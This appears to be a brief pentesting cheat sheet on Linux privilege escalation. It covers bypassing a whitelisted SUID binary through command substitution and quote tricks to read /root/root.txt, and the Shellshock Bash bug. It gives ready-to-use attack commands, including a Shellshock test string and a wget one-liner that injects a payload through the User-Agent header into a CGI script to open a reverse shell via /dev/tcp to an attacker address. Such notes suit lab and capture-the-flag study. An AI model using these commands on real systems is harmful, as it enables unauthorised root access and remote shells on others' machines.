Binary Exploitation - Linux
Bypass SUID
whitelist
SUID
whitelistSometimes
SUID
commands may have a whitelist for commands .This can be bypassed by using
subcommands
:
supershell ‘/bin/ls $(cat /root/root.txt)’
In this example
supershell
is theSUID
binary and/bin/ls
the whitelisted command, there are also another way to bypass this by using'
to open a quote:
supershell ‘/bin/ls
Then in the next line use your desired command:
cat /root/root.txt’
Exploit pkexec
pkexec
ShellSock
ShellSock
Attack vectors include remote command execution via
CGI
scripts or web servers, as well as exploitation in environments likeSSH
,HTTP
, and any process that involvesBash
interpreting environment variables.Affects
Bash
versions1.x
to4.3
:
() { :;}; echo; /usr/bin/id
Inject malicious code through the
User-Agent
header, targeting a vulnerableCGI
script in the/cgi-bin/
directory to initiate a reverse shell:
wget -U '() { :;}; echo; /bin/bash >& /dev/tcp/172.24.0.253/4443 0>&1' -O- http://172.24.0.2/cgi-bin/stats
Last updated